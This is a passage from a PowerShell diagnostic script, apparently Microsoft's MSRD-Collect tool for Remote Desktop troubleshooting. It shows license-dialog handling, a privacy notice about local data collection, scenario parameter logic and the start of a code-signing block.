HAVE THE RIGHTS BELOW. BY USING THE SOFTWARE, YOU ACCEPT THESE TERMS.\par {\pict{\*\picprop}\wmetafile8\picw26\pich26\picwgoal32000\pichgoal15 0100090000035000000000002700000000000400000003010800050000000b0200000000050000 000c0202000200030000001e000400000007010400040000000701040027000000410b2000cc00 010001000000000001000100000000002800000001000000010000000100010000000000000000 000000000000000000000000000000000000000000ffffff00000000ff040000002701ffff0300 00000000 }\par \pard {\pntext\f0 1.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart1\pndec{\pntxta.}} \fi-360\li360 INSTALLATION AND USE RIGHTS. Subject to the terms and restrictions set forth in this license, Microsoft Corporation (\ldblquote Microsoft\rdblquote ) grants you (\ldblquote Customer\rdblquote or \ldblquote you\rdblquote ) a non-exclusive, non-assignable, fully paid-up license to use and reproduce the script or utility provided under this license (the "Software"), solely for Customer\rquote s internal business purposes, to help Microsoft troubleshoot issues with one or more Microsoft products, provided that such license to the Software does not include any rights to other Microsoft technologies (such as products or services). \ldblquote Use\rdblquote means to copy, install, execute, access, display, run or otherwise interact with the Software. \par \pard\widctlpar\par \pard\widctlpar\li360 You may not sublicense the Software or any use of it through distribution, network access, or otherwise. Microsoft reserves all other rights not expressly granted herein, whether by implication, estoppel or otherwise. You may not reverse engineer, decompile or disassemble the Software, or otherwise attempt to derive the source code for the Software, except and to the extent required by third party licensing terms governing use of certain open source components that may be included in the Software, or remove, minimize, block, or modify any notices of Microsoft or its suppliers in the Software. Neither you nor your representatives may use the Software provided hereunder: (i) in a way prohibited by law, regulation, governmental order or decree; (ii) to violate the rights of others; (iii) to try to gain unauthorized access to or disrupt any service, device, data, account or network; (iv) to distribute spam or malware; (v) in a way that could harm Microsoft\rquote s IT systems or impair anyone else\rquote s use of them; (vi) in any application or situation where use of the Software could lead to the death or serious bodily injury of any person, or to physical or environmental damage; or (vii) to assist, encourage or enable anyone to do any of the above.\par \par \pard\widctlpar\fi-360\li360 2.\tab DATA. Customer owns all rights to data that it may elect to share with Microsoft through using the Software. You can learn more about data collection and use in the help documentation and the privacy statement at {{\field{\*\fldinst{HYPERLINK https://aka.ms/privacy }}{\fldrslt{https://aka.ms/privacy\ul0\cf0}}}}\f0\fs19 . Your use of the Software operates as your consent to these practices.\par \pard\widctlpar\par \pard\widctlpar\fi-360\li360 3.\tab FEEDBACK. If you give feedback about the Software to Microsoft, you grant to Microsoft, without charge, the right to use, share and commercialize your feedback in any way and for any purpose.\~ You will not provide any feedback that is subject to a license that would require Microsoft to license its software or documentation to third parties due to Microsoft including your feedback in such software or documentation. \par \pard\widctlpar\par \pard\widctlpar\fi-360\li360 4.\tab EXPORT RESTRICTIONS. Customer must comply with all domestic and international export laws and regulations that apply to the Software, which include restrictions on destinations, end users, and end use. For further information on export restrictions, visit {{\field{\*\fldinst{HYPERLINK https://aka.ms/exporting }}{\fldrslt{https://aka.ms/exporting\ul0\cf0}}}}\f0\fs19 .\par \pard\widctlpar\par \pard\widctlpar\fi-360\li360\qj 5.\tab REPRESENTATIONS AND WARRANTIES. Customer will comply with all applicable laws under this agreement, including in the delivery and use of all data. Customer or a designee agreeing to these terms on behalf of an entity represents and warrants that it (i) has the full power and authority to enter into and perform its obligations under this agreement, (ii) has full power and authority to bind its affiliates or organization to the terms of this agreement, and (iii) will secure the permission of the other party prior to providing any source code in a manner that would subject the other party\rquote s intellectual property to any other license terms or require the other party to distribute source code to any of its technologies.\par \pard\widctlpar\par \pard\widctlpar\fi-360\li360\qj 6.\tab DISCLAIMER OF WARRANTY. THE SOFTWARE IS PROVIDED \ldblquote AS IS,\rdblquote WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL MICROSOFT OR ITS LICENSORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THE SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\par \pard\widctlpar\qj\par \pard\widctlpar\fi-360\li360\qj 7.\tab LIMITATION ON AND EXCLUSION OF DAMAGES. IF YOU HAVE ANY BASIS FOR RECOVERING DAMAGES DESPITE THE PRECEDING DISCLAIMER OF WARRANTY, YOU CAN RECOVER FROM MICROSOFT AND ITS SUPPLIERS ONLY DIRECT DAMAGES UP TO U.S. $5.00. YOU CANNOT RECOVER ANY OTHER DAMAGES, INCLUDING CONSEQUENTIAL, LOST PROFITS, SPECIAL, INDIRECT, OR INCIDENTAL DAMAGES. This limitation applies to (i) anything related to the Software, services, content (including code) on third party Internet sites, or third party applications; and (ii) claims for breach of contract, warranty, guarantee, or condition; strict liability, negligence, or other tort; or any other claim; in each case to the extent permitted by applicable law. It also applies even if Microsoft knew or should have known about the possibility of the damages. The above limitation or exclusion may not apply to you because your state, province, or country may not allow the exclusion or limitation of incidental, consequential, or other damages.\par \pard\widctlpar\par \pard\widctlpar\fi-360\li360 8.\tab BINDING ARBITRATION AND CLASS ACTION WAIVER. This section applies if you live in (or, if a business, your principal place of business is in) the United States. If you and Microsoft have a dispute, you and Microsoft agree to try for 60 days to resolve it informally. If you and Microsoft can\rquote t, you and Microsoft agree to binding individual arbitration before the American Arbitration Association under the Federal Arbitration Act (\ldblquote FAA\rdblquote ), and not to sue in court in front of a judge or jury. Instead, a neutral arbitrator will decide. Class action lawsuits, class-wide arbitrations, private attorney-general actions, and any other proceeding where someone acts in a representative capacity are not allowed; nor is combining individual proceedings without the consent of all parties. The complete Arbitration Agreement contains more terms and is at {{\field{\*\fldinst{HYPERLINK https://aka.ms/arb-agreement-4 }}{\fldrslt{https://aka.ms/arb-agreement-4\ul0\cf0}}}}\f0\fs19 . You and Microsoft agree to these terms. \par \pard\widctlpar\par \pard\widctlpar\fi-360\li360 9.\tab LAW AND VENUE. If U.S. federal jurisdiction exists, you and Microsoft consent to exclusive jurisdiction and venue in the federal court in King County, Washington for all disputes heard in court (excluding arbitration). If not, you and Microsoft consent to exclusive jurisdiction and venue in the Superior Court of King County, Washington for all disputes heard in court (excluding arbitration).\par \pard\widctlpar\par \pard\widctlpar\fi-360\li360 10.\tab ENTIRE AGREEMENT. This agreement, and any other terms Microsoft may provide for supplements, updates, or third-party applications, is the entire agreement for the software.\par \pard\sa200\sl276\slmult1\f1\fs22\lang9\par \pard\f2\fs17\lang2057\par } "@ $richTextBox1.BackColor = [System.Drawing.Color]::White $btnAcknowledge.Anchor = [System.Windows.Forms.AnchorStyles]::Bottom -bor [System.Windows.Forms.AnchorStyles]::Right $btnAcknowledge.Location = New-Object System.Drawing.Point(544, 415) $btnAcknowledge.Name = "btnAcknowledge"; $btnAcknowledge.Size = New-Object System.Drawing.Size(119, 23) $btnAcknowledge.TabIndex = 1 $btnAcknowledge.Text = "Accept" $btnAcknowledge.UseVisualStyleBackColor = $True $btnAcknowledge.Add_Click({$EULA.DialogResult=[System.Windows.Forms.DialogResult]::Yes}) $btnCancel.Anchor = [System.Windows.Forms.AnchorStyles]::Bottom -bor [System.Windows.Forms.AnchorStyles]::Right $btnCancel.Location = New-Object System.Drawing.Point(669, 415) $btnCancel.Name = "btnCancel" $btnCancel.Size = New-Object System.Drawing.Size(119, 23) $btnCancel.TabIndex = 2 if($mode -ne 0) { $btnCancel.Text = "Close" } else { $btnCancel.Text = "Decline" } $btnCancel.UseVisualStyleBackColor = $True $btnCancel.Add_Click({$EULA.DialogResult=[System.Windows.Forms.DialogResult]::No}) $EULA.AutoScaleDimensions = New-Object System.Drawing.SizeF(6.0, 13.0) $EULA.AutoScaleMode = [System.Windows.Forms.AutoScaleMode]::Font $EULA.ClientSize = New-Object System.Drawing.Size(800, 450) $EULA.Controls.Add($btnCancel) $EULA.Controls.Add($richTextBox1) if($mode -ne 0) { $EULA.AcceptButton=$btnCancel } else { $EULA.Controls.Add($btnAcknowledge) $EULA.AcceptButton=$btnAcknowledge $EULA.CancelButton=$btnCancel } $EULA.ResumeLayout($false) $EULA.Size = New-Object System.Drawing.Size(800, 650) Return ($EULA.ShowDialog()) } function msrdShowEULAIfNeeded($toolName, $mode) { $eulaRegPath = "HKCU:Software\Microsoft\CESDiagnosticTools" $eulaAccepted = "No" $eulaValue = $toolName + " EULA Accepted" if(Test-Path $eulaRegPath) { $eulaRegKey = Get-Item $eulaRegPath $eulaAccepted = $eulaRegKey.GetValue($eulaValue, "No") } else { $eulaRegKey = New-Item $eulaRegPath } if($mode -eq 2) # silent accept { $eulaAccepted = "Yes" $ignore = New-ItemProperty -Path $eulaRegPath -Name $eulaValue -Value $eulaAccepted -PropertyType String -Force } else { if($eulaAccepted -eq "No") { $eulaAccepted = msrdShowEULAPopup($mode) if($eulaAccepted -eq [System.Windows.Forms.DialogResult]::Yes) { $eulaAccepted = "Yes" $ignore = New-ItemProperty -Path $eulaRegPath -Name $eulaValue -Value $eulaAccepted -PropertyType String -Force } } } return $eulaAccepted } function msrdCleanUpandExit { if (($null -ne $global:msrdTempCommandErrorFile) -and (Test-Path -Path $global:msrdTempCommandErrorFile)) { Remove-Item -Path $global:msrdTempCommandErrorFile -Force -ErrorAction SilentlyContinue } if ($global:fQuickEditCodeExist) { [msrdDisableConsoleQuickEdit]::SetQuickEdit($false) | Out-Null } if ($global:msrdForm) { $global:msrdForm.Close() } Exit } # This function disable quick edit mode. If the mode is enabled, console output will hang when key input or strings are selected. # So disable the quick edit mode during running script and re-enable it after script is finished. $QuickEditCode=@" using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Runtime.InteropServices; public static class msrdDisableConsoleQuickEdit { const uint ENABLE_QUICK_EDIT = 0x0040; // STD_INPUT_HANDLE (DWORD): -10 is the standard input device. const int STD_INPUT_HANDLE = -10; [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr GetStdHandle(int nStdHandle); [DllImport("kernel32.dll")] static extern bool GetConsoleMode(IntPtr hConsoleHandle, out uint lpMode); [DllImport("kernel32.dll")] static extern bool SetConsoleMode(IntPtr hConsoleHandle, uint dwMode); public static bool SetQuickEdit(bool SetEnabled) { IntPtr consoleHandle = GetStdHandle(STD_INPUT_HANDLE); // get current console mode uint consoleMode; if (!GetConsoleMode(consoleHandle, out consoleMode)) { // ERROR: Unable to get console mode. return false; } // Clear the quick edit bit in the mode flags if (SetEnabled) { consoleMode &= ~ENABLE_QUICK_EDIT; } else { consoleMode |= ENABLE_QUICK_EDIT; } // set the new mode if (!SetConsoleMode(consoleHandle, consoleMode)) { // ERROR: Unable to set console mode return false; } return true; } } "@ Try { Add-Type -TypeDefinition $QuickEditCode -Language CSharp -ErrorAction Stop | Out-Null $global:fQuickEditCodeExist = $True } Catch { $global:fQuickEditCodeExist = $False } #region ##### MAIN ##### [System.Windows.Forms.Application]::EnableVisualStyles() # Disabling quick edit mode as somethimes this causes the script stop working until enter key is pressed. If ($global:fQuickEditCodeExist) { [msrdDisableConsoleQuickEdit]::SetQuickEdit($True) | Out-Null } $notice = "========= Microsoft CSS Diagnostics Script =========`n This Data Collection is for troubleshooting reported issues for the given scenarios. Once you have started this script please wait until all data has been collected.`n`n ============= IMPORTANT NOTICE =============`n This script is designed to collect information that will help Microsoft Customer Support Services (CSS) troubleshoot an issue you may be experiencing with Microsoft Remote Desktop solutions.`n The collected data may contain Personally Identifiable Information (PII) and/or sensitive data, such as (but not limited to) IP addresses; PC names; and user names.`n The script will save the collected data in a folder (default C:\MS_DATA) and also compress the results into a ZIP file. This folder and its contents or the ZIP file are not automatically sent to Microsoft.`n You can send the ZIP file to Microsoft CSS using a secure file transfer tool - Please discuss this with your support professional and also any concerns you may have.`n Find our privacy statement at: https://privacy.microsoft.com/en-US/privacystatement`n " if (!($global:msrdTSSinUse)) { if ($AcceptEula) { "$(msrdGetLocalizedText "eulaSilentOK")" $eulaAccepted = msrdShowEULAIfNeeded "MSRD-Collect" 2 } else { $eulaAccepted = msrdShowEULAIfNeeded "MSRD-Collect" 0 if ($eulaAccepted -ne "Yes") { "$(msrdGetLocalizedText "eulaNotOK")" msrdCleanUpandExit } "$(msrdGetLocalizedText "eulaOK")" } if ($AcceptNotice) { "$(msrdGetLocalizedText "noticeSilentOK")`n" } else { $wshell = New-Object -ComObject Wscript.Shell $answer = $wshell.Popup("$notice",0,"Are you sure you want to continue?",4+32) if ($answer -eq 7) { Write-Warning "$(msrdGetLocalizedText "notApproved")`n" msrdCleanUpandExit } "$(msrdGetLocalizedText "noticeOK")`n" } } if ($Core -or $Profiles -or $Activation -or $AppAttach -or $MSRA -or $IME -or $HCI -or $Teams -or $SCard -or $DiagOnly -or $NetTrace -or $DumpPID) { if ($Machine) { if ($Role) { switch($Machine) { 'isRDS' { $global:msrdRDS = $true; $global:msrdAVD = $false; $global:msrdW365 = $false } 'isAVD' { $global:msrdRDS = $false; $global:msrdAVD = $true; $global:msrdW365 = $false } 'isW365' { $global:msrdRDS = $false; $global:msrdAVD = $false; $global:msrdW365 = $true } } switch($Role) { 'isSource' { $global:msrdSource = $true; $global:msrdTarget = $false } 'isTarget' { $global:msrdSource = $false; $global:msrdTarget = $true } } msrdInitFolders msrdCheckAzVM -azEnvCmdLineInputValue $AzureEnv # checking for Azure Environment and deployment details if applicable if ($global:avdnettestpath -eq "") { msrdLogMessage $LogLevel.Warning "$(msrdGetLocalizedText 'avdnettestNotFound')`n" } #if avdnettest.exe is missing if (-not $global:msrdTSSinUse) { if ($global:msrdConfig.DevLevel -eq "Insider") { msrdLogMessage $LogLevel.Info "$(msrdGetLocalizedText "starting") - v$msrdVersion (INSIDER Build - For Testing Purposes Only !)`n" -Color "Cyan" } else { msrdLogMessage $LogLevel.Info "$(msrdGetLocalizedText "starting") - v$msrdVersion`n" -Color "Cyan" } if ($global:msrdConfig.AutomaticVersionCheck -eq 1) { if ($global:msrdConfig.ScriptSelfUpdate -eq 1) { msrdCheckVersion ($msrdVersion) -selfUpdate } else { msrdCheckVersion ($msrdVersion) } } else { msrdLogMessage $LogLevel.Normal "INFO: Automatic update check on script launch is Disabled" } } if ($UserContext) { msrdLogMessage $LogLevel.Info "INFO: UserContext switch has been specified with value: $UserContext`n" } if ($PSSenderInfo) { msrdLogMessage $LogLevel.Info "INFO: The script is running in a remote PowerShell session" -Color "Yellow" msrdLogMessage $LogLevel.Info "INFO: ConnectedUser: $($PSSenderInfo.ConnectedUser)" -Color "Yellow" msrdLogMessage $LogLevel.Info "INFO: RunAsUser: $($PSSenderInfo.RunAsUser)" -Color "Yellow" } msrdInitScript $varsNO = @(,$false * 1) msrdInitScenarioVars $dumpProc = $false $pidProc = "" $global:onlyDiag = $false $vCore = @(,$true * 12) if ($Profiles) { $vProfiles = @(,$true * 5) } if ($Activation) { $vActivation = @(,$true * 3) } if ($MSRA) { $vMSRA = @(,$true * 7) } if ($SCard) { $vSCard = @(,$true * 3) } if ($IME) { $vIME = @(,$true * 3) } if ($Teams) { $vTeams = @(,$true * 4) } if ($AppAttach) { $vAppAttach = @(,$true * 1) } if ($HCI) { $vHCI = @(,$true * 1) } if ($DumpPID) { $pidProc = $DumpPID; $dumpProc = $true } if ($DiagOnly) { $vCore = $varsNO; $global:onlyDiag = $true } if (-not $DiagOnly) { #data collection $parameters = @{ varsCore = $vCore varsProfiles = $vProfiles varsActivation = $vActivation varsMSRA = $vMSRA varsSCard = $vSCard varsIME = $vIME varsTeams = $vTeams varsMSIXAA = $vAppAttach varsHCI = $vHCI traceNet = $NetTrace dumpProc = $dumpProc pidProc = $pidProc } msrdCollectData @parameters } $varsSystem = @(,$true * 13) $varsAVDRDS = @(,$true * 11) $varsInfra = @(,$true * 10) $varsAD = @(,$true * 2) $varsNET = @(,$true * 8) $varsLogSec = @(,$true * 3) $varsIssues = @(,$true * 2) $varsOther = @(,$true * 4) #diagnostics $parameters = @{ varsSystem = $varsSystem varsAVDRDS = $varsAVDRDS varsInfra = $varsInfra varsAD = $varsAD varsNET = $varsNET varsLogSec = $varsLogSec varsIssues = $varsIssues varsOther = $varsOther } msrdCollectDataDiag @parameters msrdArchiveData -varsCore $vCore } else { Write-Warning "Include the '-Role' parameter to indicate the role of the machine in the selected remote desktop solution, or run the script without any parameters (= GUI mode).`nSupported values for the '-Role' parameter: 'isSource', 'isTarget'.`nSee MSRD-Collect-ReadMe.txt for more details.`nExiting..." Exit } } else { Write-Warning "Include the '-Machine' parameter to indicate the type of environment from where data should be collected, or run the script without any parameters (= GUI mode).`nSupported values for the '-Machine' parameter: 'isAVD', 'isRDS', 'isW365'.`nSee MSRD-Collect-ReadMe.txt for more details.`nExiting..." Exit } } else { if (-not $global:msrdTSSinUse) { $code = @" using System; using System.Runtime.InteropServices; namespace System { public class IconExtractor { public static System.Drawing.Icon Extract(string file, int number, bool largeIcon) { IntPtr large; IntPtr small; ExtractIconEx(file, number, out large, out small, 1); try { // Create a copy of the icon to avoid handle ownership issues var extractedIcon = (System.Drawing.Icon)System.Drawing.Icon.FromHandle(largeIcon ? large : small).Clone(); // Release the handles obtained from ExtractIconEx DestroyIcon(large); DestroyIcon(small); return extractedIcon; } catch { return null; } } [DllImport("Shell32.dll", EntryPoint = "ExtractIconExW", CharSet = CharSet.Unicode, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)] private static extern int ExtractIconEx(string sFile, int iIndex, out IntPtr piLargeVersion, out IntPtr piSmallVersion, int amountIcons); [DllImport("user32.dll", CharSet = CharSet.Auto)] private static extern bool DestroyIcon(IntPtr handle); } } "@ if ($PSVersionTable.PSVersion.Major -eq 5) { Add-Type -TypeDefinition $code -ReferencedAssemblies System.Drawing } else { Add-Type -TypeDefinition $code -ReferencedAssemblies System.Drawing.Common,System.Drawing } Add-Type -AssemblyName System.Windows.Forms $global:msrdRDS = $false; $global:msrdAVD = $false; $global:msrdW365 = $false $global:msrdSource = $false; $global:msrdTarget = $false #Load dlls into context of the current console session Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport("Kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); ' if ($msrdGUILite -eq 1) { Import-Module -Name "$PSScriptRoot\Modules\MSRDC-FwGUILite" -DisableNameChecking -Force msrdAVDCollectGUILite } else { Import-Module -Name "$PSScriptRoot\Modules\MSRDC-FwGUI" -DisableNameChecking -Force msrdAVDCollectGUI } } } #endregion ##### MAIN ##### # SIG # Begin signature block # MIIoUgYJKoZIhvcNAQcCoIIoQzCCKD8CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCvqUVrqWvbD8+y # R67SmiOMgtmq14/fjT8TkOxO4kgwxKCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIAI # NdxzMqdzRM+29jesbvOZVU4baugOPkqM0ZslvlF5MEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAgs2I88YzVjEvWKWiIRalOuzVS8T52SeLoqa5 # /QezLZy7XgZXxUmdGubMigwYxj6XbUMhTfmUGJTvgLHNjlevmOb+Z1ablPI1siLM # qpb+F7d7p0vQpL4RkzaHqJV2Xzs6KlB3tF8wZu5heEBRByP023VPZ2MrIWnUW4hX # D6pFz5HnuDE3LnWxFbQY3M9Lx77abG3LX7qsFl7OqZx2LkBvwzZpEhUHIJIP3mxf # 